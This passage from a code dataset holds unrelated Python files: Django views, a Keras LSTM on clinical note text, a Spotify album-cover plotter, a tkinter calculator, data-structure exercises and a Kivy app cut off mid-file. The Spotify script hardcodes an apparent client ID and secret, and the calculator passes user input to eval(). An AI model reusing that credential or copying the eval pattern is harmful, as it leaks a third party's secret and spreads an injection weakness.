val.update({'custom':hash_})\n url.objects.create(**val)\n return render(request,'result.html',{'link': hash_})\n \n\n \n else:\n form = UrlForm()\n return render(request, 'index.html',{'form': form})\n\ndef result(request):\n return render(request,'result.html')\n\ndef go(request,link):\n hash_=link\n go=get_object_or_404(url, custom=hash_)\n return 
HttpResponsePermanentRedirect(go.url)\n\n","sub_path":"shortener/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"106047279","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 29 15:26:15 2019\n\n@author: vidhi\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport GPy\nnp.random.seed(12345)\n\n# Define dataset \nN = 100\nk1 = GPy.kern.RBF(5, variance=1, lengthscale=1./np.random.dirichlet(np.r_[10,10,10,0.1,0.1]), ARD=True)\nk2 = GPy.kern.RBF(5, variance=1, lengthscale=1./np.random.dirichlet(np.r_[10,0.1,10,0.1,10]), ARD=True)\nk3 = GPy.kern.RBF(5, variance=1, lengthscale=1./np.random.dirichlet(np.r_[0.1,0.1,10,10,10]), ARD=True)\nX = np.random.normal(0, 1, (N, 5))\nA = np.random.multivariate_normal(np.zeros(N), k1.K(X), 10).T\nB = np.random.multivariate_normal(np.zeros(N), k2.K(X), 10).T\nC = np.random.multivariate_normal(np.zeros(N), k3.K(X), 10).T\n\nY = np.vstack((A,B,C))\nlabels = np.hstack((np.zeros(A.shape[0]), np.ones(B.shape[0]), np.ones(C.shape[0])*2))\n\ninput_dim = 2 # How many latent dimensions to use\nkernel = GPy.kern.RBF(input_dim, 1, ARD=True) \n\nQ = input_dim\nm_gplvm = GPy.models.GPLVM(Y, Q, kernel=GPy.kern.RBF(Q))\nm_gplvm.kern.lengthscale = .2\nm_gplvm.kern.variance = 1\nm_gplvm.likelihood.variance = 1.\nm_gplvm\n\nm_gplvm.plot_latent(labels=labels)\n\n","sub_path":"GP/Advanced Gaussian Processes/gp_lvm.py","file_name":"gp_lvm.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351701432","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 6 10:18:34 2019\n\n@author: Rohit\n\"\"\"\n\n# from __future__ import print_function\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.layers import LSTM, Input, Flatten, Bidirectional\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras.metrics import categorical_accuracy\nimport numpy as np\nimport random\nimport sys\nimport os\nimport time\nimport codecs\nimport collections\nfrom six.moves import cPickle\nimport nltk\nfrom nltk.corpus import stopwords\n\n\n# =============================================================================\n# preprocessing\n# =============================================================================\n# =============================================================================\n# import re\n# import nltk\n# import pandas as pd\n# nltk.download('stopwords')\n# from nltk.corpus import stopwords\n# =============================================================================\n\n# pre-processing\n# =============================================================================\n# chunksize = 100000\n# chunks = pd.read_csv('NOTEEVENTS.csv', chunksize=chunksize);\n# \n# dfList = []\n# for chunk in chunks:\n# #df_mimic_chunk = chunk # used with smaller set of data\n# #break \n# dfList.append(chunk)\n# \n# # used with larger set of data\n# df = pd.concat(dfList,sort=False)\n# df_mimic_chunk_text = list(df['TEXT'])\n# \n# for index, val in enumerate(df_mimic_chunk_text): \n# stratingString = df_mimic_chunk_text[index].find(\"History of Present Illness:\")\n# endingString = df_mimic_chunk_text[index].find(\"Physical Exam:\")\n# if stratingString == -1 or 
endingString == -1:\n# df_mimic_chunk_text[index] = \"\"\n# continue\n# df_mimic_chunk_text[index] = re.sub('[^a-zA-Z]', ' ', str(df_mimic_chunk_text[index]))\n# df_mimic_chunk_text[index] = df_mimic_chunk_text[index].lower()\n# df_mimic_chunk_text[index] = df_mimic_chunk_text[index].split()\n# df_mimic_chunk_text[index] = [word for word in df_mimic_chunk_text[index] if not word in set(stopwords.words('english'))]\n# df_mimic_chunk_text[index] = ' '.join(df_mimic_chunk_text[index])\n# \n# with open('/home/chandra/rohit-lstm/lstm-large/data/mimic-data/txt/mimic-data-file.txt', 'w') as filehandle: \n# filehandle.writelines(\"%s\\n\" % data for data in df_mimic_chunk_text)\n# =============================================================================\n\n\n# import spacy, and english model\nimport spacy\nnlp = spacy.load('en')\n\n# setting the parameters\n# data directory containing input.txt\n# =============================================================================\n# data_dir = 'C:\\\\Masters-LUC\\\\spring-2019\\\\research\\\\mimic-iii-project\\\\lstm-large\\\\Next-word-prediction---bidirectional-lstm\\\\data\\\\mimic-data\\\\txt'\n# # directory to store models\n# save_dir = 'C:\\\\Masters-LUC\\\\spring-2019\\\\research\\\\mimic-iii-project\\\\lstm-large\\\\Next-word-prediction---bidirectional-lstm\\\\save'\n# =============================================================================\n\n# pre-processing test file\n# =============================================================================\n# file = 'mimic-data-file-test.txt'\n# with open(data_dir+'/'+ file, 'r') as file_data:\n# file_data = file_data.read()\n# file_data = re.sub('[^a-zA-Z]', ' ', str(file_data))\n# file_data = file_data.lower()\n# file_data = file_data.split()\n# file_data = [word for word in file_data if not word in set(stopwords.words('english'))]\n# file_data = ' '.join(file_data)\n# \n# with open( data_dir + '/mimic-data-file-test-processed.txt', 'w+') as filehandle: \n# filehandle.write(file_data)\n# ============================================================================= \n\n\n# Directory structure for GPU\n# =============================================================================\n# data_dir = '/home/chandra/rohit-git/data/mimic-data/txt'\n# save_dir = '/home/chandra/rohit-git/save'\n# =============================================================================\n\n# Directory structure for AWS EC2\ndata_dir = '/home/ec2-user/rohit/Next-word-prediction---bidirectional-lstm/data/mimic-data/txt'\nsave_dir = '/home/ec2-user/rohit/Next-word-prediction---bidirectional-lstm/save'\n\nseq_length = 30 # sequence length\nsequences_step = 1 #step to create sequences\n\n\nfrom os.path import join\n\n# for gpu\nfile_name = 'mimic-data-file-test-processed.txt'\nvocab_file = join(save_dir, \"words_vocab.pkl\")\n\nnum_words = 0\nwith open(data_dir+'/'+ file_name, 'r') as f:\n# with open(data_dir+'/'+txt, 'r', encoding=\"utf8\") as f:\n for line in f:\n words = line.split()\n num_words += len(words)\nprint(\"Number of words:\")\nprint(num_words)\n\n# =============================================================================\n# document = nlp(u'My name is rohit jagannath. I am a masters degreee holder. 
I want to get back to stream')\n# print(document)\n# print(type(document))\n# =============================================================================\n\n# read data\ndef create_wordlist(doc):\n wl = []\n for word in doc:\n if word.text not in (\"\\n\",\"\\n\\n\",'\\u2009','\\xa0'):\n wl.append(word.text.lower())\n return wl\n\n#pre-processing\n# =============================================================================\n# punctuation = '!@#$%^&*()_-+={}[]:;\"\\'|<>,.?/~`'\n# print(nlp.Defaults.stop_words)\n# =============================================================================\n\n# create list of sentences\nwordlist = []\ninput_file = os.path.join(data_dir, file_name)\n#read data\nwith codecs.open(input_file, \"r\", encoding=\"utf8\") as f:\n data = f.read()\n#create sentences\ndoc = nlp(data) # using spacy\nwl = create_wordlist(doc) # using spacy\n# wl = nltk.word_tokenize(data) # using NLTK\nwordlist = wordlist + wl \n \n# create dictionary\n \n# count the number of words\nword_counts = collections.Counter(wordlist)\n\n# Mapping from index to word : that's the vocabulary\nvocabulary_inv = [x[0] for x in word_counts.most_common()]\nvocabulary_inv = list(sorted(vocabulary_inv))\n\n# Mapping from word to index\nvocab = {x: i for i, x in enumerate(vocabulary_inv)}\nwords = [x[0] for x in word_counts.most_common()]\n\n#size of the vocabulary\nvocab_size = len(words)\nprint(\"vocab size: \", vocab_size)\nprint(words)\n\n#save the words and vocabulary\nwith open(os.path.join(vocab_file), 'wb') as f:\n cPickle.dump((words, vocab, vocabulary_inv), f)\n \n# create sequences\nsequences = []\nnext_words = []\nfor i in range(0, len(wordlist) - seq_length, sequences_step):\n sequences.append(wordlist[i: i + seq_length])\n next_words.append(wordlist[i + seq_length])\n\nprint('nb sequences:', len(sequences)) \n\n# training\nX = np.zeros((len(sequences), seq_length, vocab_size), dtype=np.bool)\ny = np.zeros((len(sequences), vocab_size), dtype=np.bool)\nfor i, sentence in enumerate(sequences):\n for t, word in enumerate(sentence):\n X[i, t, vocab[word]] = 1\n y[i, vocab[next_words[i]]] = 1\n \n\n# Build Model\n# =============================================================================\ndef bidirectional_lstm_model(seq_length, vocab_size):\n print('Build LSTM model.')\n model = Sequential()\n model.add(Bidirectional(LSTM(rnn_size, activation=\"relu\"),input_shape=(seq_length, vocab_size)))\n model.add(Dropout(0.6))\n model.add(Dense(vocab_size))\n model.add(Activation('softmax'))\n \n optimizer = Adam(lr=learning_rate)\n callbacks=[EarlyStopping(patience=2, monitor='val_loss')]\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=[categorical_accuracy])\n return model\n\nrnn_size = 256 # size of RNN\nbatch_size = 32 # minibatch size\nseq_length = 30 # sequence length\nnum_epochs = 20 # number of epochs\nlearning_rate = 0.001 #learning rate\nsequences_step = 1 #step to create sequences\n\nmd = bidirectional_lstm_model(seq_length, vocab_size)\nmd.summary()\n\n#fit the model\ncallbacks=[EarlyStopping(patience=4, monitor='val_loss'),\n ModelCheckpoint(filepath=save_dir + \"/\" + 'my_model_gen_sentences_lstm.{epoch:02d}-{val_loss:.2f}.hdf5',\\\n monitor='val_loss', verbose=0, mode='auto', period=2)]\nhistory = md.fit(X, y,\n batch_size=batch_size,\n shuffle=True,\n epochs=num_epochs,\n callbacks=callbacks,\n validation_split=0.01)\n\n# save the model\nmd.save(save_dir + \"/\" + 'my_model_gen_sentences_lstm.final.hdf5')\n\n# Generation flow starts here\n\n#load 
vocabulary\nprint(\"loading vocabulary...\")\nvocab_file = os.path.join(save_dir, \"words_vocab.pkl\")\n\nwith open(os.path.join(save_dir, 'words_vocab.pkl'), 'rb') as f:\n words, vocab, vocabulary_inv = cPickle.load(f)\n\nvocab_size = len(words)\n\nfrom keras.models import load_model\n# load the model\nprint(\"loading model...\")\nmodel = load_model(save_dir + \"/\" + 'my_model_gen_sentences_lstm.final.hdf5')\n\ndef sample(preds, temperature=1.0):\n # helper function to sample an index from a probability array\n preds = np.asarray(preds).astype('float64')\n preds = np.log(preds) / temperature\n exp_preds = np.exp(preds)\n preds = exp_preds / np.sum(exp_preds)\n probas = np.random.multinomial(1, preds, 1)\n return np.argmax(probas)\n\n#initiate sentences\nseed_sentences = u'granulation tissue distal right'\ngenerated = ''\nsentence = []\nfor i in range (seq_length):\n sentence.append(\"revealed\")\n\nseed = seed_sentences.split()\n\nfor i in range(len(seed)):\n sentence[seq_length-i-1]=seed[len(seed)-i-1]\n\ngenerated += ' '.join(sentence)\nprint('Generating text with the following seed: \"' + ' '.join(sentence) + '\"')\n\nprint ()\n\nwords_number = 10\n#generate the text\nfor i in range(words_number):\n #create the vector\n x = np.zeros((1, seq_length, vocab_size))\n for t, word in enumerate(sentence):\n x[0, t, vocab[word]] = 1.\n #print(x.shape)\n\n #calculate next word\n preds = model.predict(x, verbose=0)[0]\n predsList = preds.tolist();\n top5indexes = sorted(range(len(predsList)), key=lambda i: predsList[i], reverse=True)[:5]\n top5words = []\n for i in top5indexes:\n top5words.append(vocabulary_inv[i]);\n # print(top5words)\n \n \n #print(\"Predictions: \", preds)\n #print(\"Sorted Predictions: \", predsList)\n next_index = sample(preds, 0.34)\n print(\"next_index: \", next_index)\n next_word = vocabulary_inv[next_index]\n print(\"next_word: \", next_word)\n\n #add the next word to the text\n generated += \" \" + next_word\n # shift the sentence by one, and and the next word at its end\n sentence = sentence[1:] + [next_word]\n\nprint(generated)\n\n\n\n\n","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":10769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"586947962","text":"import pandas as pd\n\nfrom collie_recs.interactions import HDF5InteractionsDataLoader\nfrom collie_recs.metrics import evaluate_in_batches, mapk\n\n\ndef test_implicit_model(implicit_model, train_val_implicit_data):\n train, test = train_val_implicit_data\n\n item_preds = implicit_model.get_item_predictions(user_id=0,\n unseen_items_only=True,\n sort_values=True)\n\n assert isinstance(item_preds, pd.Series)\n assert len(item_preds) > 0\n assert len(item_preds) < len(train)\n\n item_similarities = implicit_model.item_item_similarity(item_id=42)\n assert item_similarities.index[0] == 42\n\n mapk_score = evaluate_in_batches([mapk], test, implicit_model)\n\n # The metrics used for evaluation have been determined through 30\n # trials of training the model and using the mean - 5 * std. 
dev.\n # as the minimum score the model must achieve to pass the test.\n assert mapk_score > 0.044\n\n\ndef test_other_models_trained_for_one_epoch(other_models_trained_for_one_epoch,\n train_val_implicit_data):\n train, test = train_val_implicit_data\n\n if not isinstance(other_models_trained_for_one_epoch.train_loader, HDF5InteractionsDataLoader):\n item_preds = other_models_trained_for_one_epoch.get_item_predictions(user_id=0,\n unseen_items_only=True,\n sort_values=True)\n\n assert isinstance(item_preds, pd.Series)\n assert len(item_preds) > 0\n assert len(item_preds) < len(train)\n\n item_similarities = other_models_trained_for_one_epoch.item_item_similarity(item_id=42)\n assert item_similarities.index[0] == 42\n","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"68566118","text":"import spotipy.oauth2 as oauth2\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport requests\r\nimport spotipy\r\nimport pickle\r\nfrom skimage import io\r\n\r\ncredentials = oauth2.SpotifyClientCredentials(\r\n client_id='f91e9418e0f142cb9ec5d1058aed4b5b',\r\n client_secret='051c70545d9441e192a8a5e57a7e7558')\r\n\r\nlibrary = []\r\ni = 0\r\n\r\ndata = pd.read_csv('playlist.csv')\r\ndata = data.iloc[:,0]\r\ndata = list(map(lambda x: x.split(\":\")[-1], data)) \r\n\r\nfor id in data:\r\n token = {\"Authorization\" : \"Bearer {}\".format(credentials.get_access_token())}\r\n url = \"https://api.spotify.com/v1/tracks/\" + id\r\n r = requests.get(url, headers=token)\r\n track = []\r\n try:\r\n track.append(r.json()['album']['release_date'][:4])\r\n track.append(r.json()['album']['images'][2]['url'])\r\n track.append(r.json()['album']['name'])\r\n track.append(r.json()['artists'][0]['name'])\r\n track.append(r.json()['name'])\r\n except KeyError:\r\n continue\r\n library.append(track)\r\n i+=1\r\n\r\ndumpfile = open('library.dump','wb')\r\npickle.dump(library,dumpfile)\r\ndumpfile = open(\"library.dump\", 'rb')\r\nlibrary = pickle.load(dumpfile)\r\n\r\nyears = []\r\nalbums = []\r\nal_covers = []\r\nal_years = []\r\nal_artist = []\r\nal_num_track = []\r\nfor track in library:\r\n years.append(int(track[0]))\r\n if track[2] not in albums:\r\n albums.append(track[2])\r\n al_covers.append(track[1])\r\n al_years.append(track[0])\r\n al_artist.append(track[3])\r\n al_num_track.append(1)\r\n elif track[2] in albums:\r\n al_num_track[albums.index(track[2])] += 1\r\n\r\nmax_num = 0\r\nfor curr_year in range(1960, 2020):\r\n num = 0\r\n #print(curr_year)\r\n index = 0\r\n for year in al_years:\r\n if int(year) == curr_year:\r\n #print(albums[index], \"-\", al_artist[index])\r\n image = io.imread(al_covers[index])\r\n plt.imshow(image, extent=[int(year)*10, int(year)*10 + 10, int(num)*10, int(num)*10 + 10])\r\n if int(year) == curr_year:\r\n num += 1\r\n if num > max_num:\r\n max_num = num\r\n index += 1\r\n \r\nplt.tight_layout()\r\nplt.xlim([19600, 20200])\r\nplt.ylim([0, max_num*10])\r\nplt.xticks(range(19600, 20201, 100), range(1960, 2021, 10))\r\nplt.yticks(range(0, max_num*10+1, 50), range(0, max_num+1, 5))\r\nplt.title(\"My Music Library in Album Covers 1960-Present\")\r\nplt.xlabel(\"Year\")\r\nplt.ylabel(\"Number of Albums\")\r\n\r\nplt.savefig(\"library.png\", bbox_inches=\"tight\",transparent=True,facecolor='blanchedalmond', 
dpi=1100)\r\n","sub_path":"SpotifyLibrary.py","file_name":"SpotifyLibrary.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"273691404","text":"from gusPyCode.MDAP_proj.MDAP_defs import findBestPairAlignments\nfrom TAMO.MotifTools import Motif,load\n\n\niFiles = ['/Users/biggus/Documents/James/Collaborations/Campbell/data/Results_HyperGeoScreen/masked/Results_gGEMS/CCupAt4Days.6-8mers.gGEMS.top6.motifs.stdThresh.tmo']\nmotifs = []\n\nfor i in range(len(iFiles)):\n motifs.extend(load(iFiles[i]))\n\n\n \nmat = findBestPairAlignments(motifs, 1)\n\nNone\n","sub_path":"gusPyCode/MDAP_proj/test_findBestPairAlignments.py","file_name":"test_findBestPairAlignments.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"337765106","text":"from flask import Blueprint\nfrom webapp import signals\n\nbp = Blueprint(\"mod_a\", __name__, template_folder=\"templates\")\n\n@signals.on_app_initialize.connect\ndef initialize(app):\n print(\"init a\")\n app.register_blueprint(bp, url_prefix=\"/a\")\n\n\n@bp.route(\"/\")\ndef index():\n return \"a\"","sub_path":"webapp/modules/mod_a/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"566254653","text":"from tkinter import*\n\"\"\"\nAuthor: F.J\n\nSome terms to define:\npadding = the space between its content and its border.\n\"\"\"\n# display whatever the user clicks on\ndef btnOnClick(numb):\n global operator # operator will hold my expressions for manipulation\n operator = operator + str(numb);\n text_input.set(operator);\n\n# perfom the user's operation and display the result \ndef btnEqual():\n try:\n global operator\n Op_res = str(eval(operator));\n text_input.set(Op_res);\n operator = \"\";\n # if error is generate then handle\n except:\n text_input.set(\"Invalid Operation\")\n# messagebox.showerror(\"An error has occurred\", \"Invalid Operation\")\n operator = \"\";\n\n# clearing everything on sreen\ndef btnClear():\n global operator\n operator = \"\";\n text_input.set(\"\");\n \nUiCal = Tk();\nUiCal.title(\"Demo Calculator\")\n# UiCal.geometry(\"200x300\") # set GUI size in pixel: width x height\noperator = \"\"\ntext_input = StringVar()\n\n# display screen creation (i.e. 
an entry text)\ntxtDisplay = Entry(UiCal,\n font = ('Comic Sans MS', 20, 'bold'),\n textvariable = text_input,\n bd = 5,\n insertwidth = 4,\n fg = 'blue',\n bg = 'white',\n justify = 'right').grid(columnspan=4);\n\n# creation of buttons\nbtn1 = Button(UiCal,\n padx = 20, # you can also add pady = 16\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = '0',\n command = lambda:btnOnClick(0),\n height=1, width=2).grid(row=1, column=0)\n\nbtn2 = Button(UiCal,\n padx = 20,\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = '1',\n command = lambda:btnOnClick(1),\n height=1, width=2).grid(row=1, column=1)\n\ndiv_btn3 = Button(UiCal,\n padx = 20,\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = '/', # or '÷' equally as valid\n command = lambda:btnOnClick(\"/\"), # or '÷' equally as valid\n height=1, width=2).grid(row=1, column=2)\n\nEqbtn = Button(UiCal,\n padx = 20,\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = '=',\n command = btnEqual,\n height=1, width=2).grid(row=1, column=3)\n\nClrbtn = Button(UiCal,\n padx = 20,\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = 'Cl',\n command = btnClear,\n height=1, width=2).grid(row=2, column=0)\n\nQuitbtn = Button(UiCal,\n padx = 20,\n bd = 4,\n fg = 'black',\n bg = 'grey',\n font = ('Comic Sans MS', 20, 'bold'),\n text = 'Quit',\n command = UiCal.destroy, # use destroy to close GUI\n height=1, width=2).grid(row=2, column=3)\n \n# start the App\nUiCal.mainloop()","sub_path":"Class_demo_calc.py","file_name":"Class_demo_calc.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"435125851","text":"'''\nStacks are an ordered collection of items that follow the LIFO procedure.\n\n'''\nclass Stack:\n def __init__(self):\n self.stack = []\n def is_empty(self):\n return self.stack == []\n def push(self,x):\n return self.stack.append(x)\n def peek(self):\n return self.stack[len(self.stack)-1]\n def size(self):\n return len(self.stack)\n def pop(self):\n return self.stack.pop()\n\ndef symbol_checker(symbol_string):\n stack = Stack()\n balanced = True\n index = 0\n while index < len(symbol_string) and balanced:\n symbol = symbol_string[index]\n if symbol == \"(\":\n stack.push(symbol)\n else:\n if stack.is_empty():\n balanced = False\n else:\n stack.pop()\n index = index + 1\n if balanced and stack.is_empty():\n return True\n else:\n return False\n\ndef par_checker(symbol_string):\n stack = Stack()\n balanced = True\n index = 0\n while index < len(symbol_string) and balanced:\n symbol = symbol_string[index]\n if symbol in '({[':\n stack.push(symbol)\n else:\n if stack.is_empty():\n balanced = False\n else:\n top = stack.pop()\n if not matches(top, symbol):\n balanced = False\n index = index + 1\n if balanced and stack.is_empty():\n return True\n else:\n return False\ndef matches(open,close):\n opens = \"{[(\"\n closes = '}])'\n return opens.index(open) == closes.index(close)\n\ndef binary_conversion(x):\n stack = Stack()\n if x < 0:\n print(\"Please enter an integer greater than 0\")\n while x > 0:\n rem = x%2\n stack.push(rem)\n x = x//2\n\n binary_string = \"\"\n while not stack.is_empty():\n binary_string = binary_string + str(stack.pop())\n\n return binary_string\nprint(binary_conversion(42))\n\n\ndef infix_to_postfix(operation):\n precedence = {}\n precedence['*'] = 
3\n precedence['/'] = 3\n precedence['+'] = 2\n precedence[\"-\"] = 2\n precedence['('] = 1\n\n\n op_stack = Stack()\n output = []\n split_operations = operation.split()\n\n for split_operation in split_operations:\n if split_operation in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\" or split_operation in \"123456789\":\n output.append(split_operation)\n\n elif split_operation == \"(\":\n op_stack.push(split_operation)\n\n elif split_operation == \")\":\n top_token = op_stack.pop()\n while top_token != \"(\":\n output.append(top_token)\n top_token = op_stack.pop()\n else:\n while not op_stack.is_empty() and precedence[op_stack.peek()] >= precedence[split_operation]:\n output.append(op_stack.pop())\n op_stack.push(split_operation)\n return \"\".join(output)\n\nprint(infix_to_postfix(\"(A * B + C * D)\"))\n\n\n\n\n","sub_path":"stacks.py","file_name":"stacks.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"158115639","text":"# loop over every character, using this char as center to make a palindrome\n# longest so far: maxx\n# when using char as center, two types:\n# 1. even, char in the left side middle (since we scan from left to right)\n# 2. odd, char in the exact middle\n# def check palindromic length as a function (center l, center r)\n\n# string \n# maxx = max(maxx,odd,even, key = len) \n# according to the len return string result\n\n# time: O(n^2)\n# space: O(1)\n\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n maxx = \"\"\n for i in range(len(s)):\n # odd:\n odd = self.palindromic(i-1,i+1,s)\n # even:\n even = self.palindromic(i,i+1,s)\n maxx = max(maxx,odd,even, key = len) \n # according to the len return string result\n return maxx\n \n def palindromic(self,l,r,s):\n while l>=0 and r<len(s) and s[l]==s[r]:\n l -= 1\n r += 1\n return s[l+1:r]\n","file_ext":"py","program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"text":"from django.conf.urls import url\nfrom django.conf import settings\nfrom project1 import book, project\n\nurlpatterns = [\n url(r'^hello/(?P<name>\\w{3})/(?P<day>\\d\\d)/$', project.hello),\n url(r'^time/$', project.current_datetime),\n url(r'^time/(\\d{1,2})/$', project.hours_ahead),\n ]\n\nurlpatterns += [\n url(r'^$',book.index),\n url(r'^search-form/$',book.search_form),\n url(r'^contact/$', book.contact),\n ]\n\nif settings.DEBUG:\n urlpatterns += [\n url(r'^debuginfo/$',project.debug)\n ]","sub_path":"Django2/project1/project1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497713685","text":"\"\"\"\nroot.py is the base container file for the whole app. 
It contains 2 classes, RootManager and RootApp.\nRootManager extends ScreenManager, and serves as the screen manager for the whole app.\nRootApp extends App, and is the base class of the app.\n\"\"\"\nimport datetime\nimport os\n\nfrom kivy.app import App\nfrom kivy.uix.screenmanager import ScreenManager\nfrom kivy.lang import Builder\nfrom kivy.properties import NumericProperty, StringProperty, DictProperty\nfrom kivy.config import Config\nfrom kivy.core.window import Window\n\nimport DatabaseHelper\nimport MainMenu\nimport LoginScreen\nimport PartyForms\nimport GroupForms\nimport FriendList\nimport ProfileForms\n\ndbFileWin = \"AKIAIHS4G2OWPNOX2CTQ_us-east-1.db\"\ndbFileLin = \"AKIAISEQ3C6Z7NODFBBQ_us-east-1.db\"\ndbFileWin10 = \"AKIAJO67AMC5VFHQZBPQ_us-east-1.db\"\nBuilder.load_file('loginscreen.kv')\nBuilder.load_file('mainmenu.kv')\n\n\nclass RootManager(ScreenManager):\n \"\"\"\n RootManager is the screen manager class for the whole app.\n \"\"\"\n curUserDictKivy = DictProperty()\n curUserDict = {} # keys = ['uid', 'username']\n friendList = [] # list of 'Friend' objects\n groupList = []\n myGroups = None\n loginScreen = None\n dbFileWin = StringProperty(dbFileWin)\n\n def __init__(self, **kwargs):\n \"\"\"\n This constructor adds all the screens for the app.\n :param kwargs: A dictionary of keyword arguments to be passed to the superclass.\n \"\"\"\n super(RootManager, self).__init__(**kwargs)\n\n # Add all screens for the app\n self.add_widget(LoginScreen.HomeScreen())\n self.add_widget(LoginScreen.LoginScreen(dbFileWin))\n self.add_widget(LoginScreen.SignupScreen(dbFileWin))\n self.add_widget(MainMenu.GroupScreen())\n self.add_widget(MainMenu.PlayNowScreen())\n self.add_widget(ProfileForms.ProfileScreen())\n self.add_widget(PartyForms.InitialForm())\n self.add_widget(PartyForms.StartPartyForm())\n self.add_widget(PartyForms.JoinPartyForm())\n self.add_widget(GroupForms.CreateGroup())\n self.add_widget(GroupForms.BrowseGroups())\n self.add_widget(GroupForms.GroupFilter())\n\n def removeGroup(self, group):\n \"\"\"\n removeGroup() is responsible for removing the given group from the groupList field of this class.\n :param group: an instance of the GroupForms.Group. This represents the group to be removed\n :return: None\n \"\"\"\n print(\"BEGIN RootManager.removeGroup()\")\n index = 0\n groupFound = False\n for tempGroup in self.groupList:\n if tempGroup.groupID == group.groupID:\n groupFound = True\n break\n else:\n index += 1\n if groupFound:\n self.groupList.pop(index)\n else:\n print(\"ERROR: Group Not in RootManager.groupList\")\n print(\"END RootManager.removeGroup()\")\n return\n\n def reloadMyGroups(self):\n \"\"\"\n reloadMyGroups() is responsible for calling MyGroups.reload(). 
This method is called whenever the groupList\n changes, that is whenever the current user joins a group, leaves a group, is promoted inside a group, and so on.\n :return: None\n \"\"\"\n if self.myGroups:\n self.myGroups.reload(self.groupList)\n return\n\n def appendGroupList(self, group):\n \"\"\"\n appendGroupList() is responsible for adding groups to the groupList field.\n :param group: An instance of GroupForms.Group\n :return: None\n \"\"\"\n self.groupList.append(group)\n return\n\n def reloadScreens(self):\n \"\"\"\n reloadScreens() removes every screen from the manager and re-adds fresh instances of each, resetting the UI.\n :return: None\n \"\"\"\n #self.clear_widgets()\n while self.next():\n screenName = self.previous()\n self.remove_widget(self.get_screen(screenName))\n # self.remove_widget(self.get_screen('homescreen'))\n # self.remove_widget(self.get_screen('creategroup'))\n print(\"Screen List Length: \" + str(len(self.screens)))\n\n # Add all screens for the app\n self.add_widget(LoginScreen.HomeScreen())\n self.add_widget(LoginScreen.LoginScreen(dbFileWin))\n self.add_widget(LoginScreen.SignupScreen(dbFileWin))\n self.add_widget(MainMenu.GroupScreen())\n self.add_widget(MainMenu.PlayNowScreen())\n self.add_widget(ProfileForms.ProfileScreen())\n self.add_widget(PartyForms.InitialForm())\n self.add_widget(PartyForms.StartPartyForm())\n self.add_widget(PartyForms.JoinPartyForm())\n self.add_widget(GroupForms.CreateGroup())\n self.add_widget(GroupForms.BrowseGroups())\n self.add_widget(GroupForms.GroupFilter())\n return\n\n def logOut(self):\n \"\"\"\n logOut() clears the cached user, friend, and group data and returns the app to the home screen.\n :return: None\n \"\"\"\n print(\"BEGIN RootManager.logOut()\")\n self.reloadScreens()\n\n self.curUserDict = {} # keys = ['uid', 'username']\n self.friendList = [] # list of 'Friend' objects\n self.groupList = []\n self.myGroups = None\n self.current = 'homescreen'\n print(\"User Logged Out Successfully.\")\n print(\"END RootManager.logOut()\")\n return\n\n\nclass RootApp(App):\n \"\"\"\n RootApp extends App. 
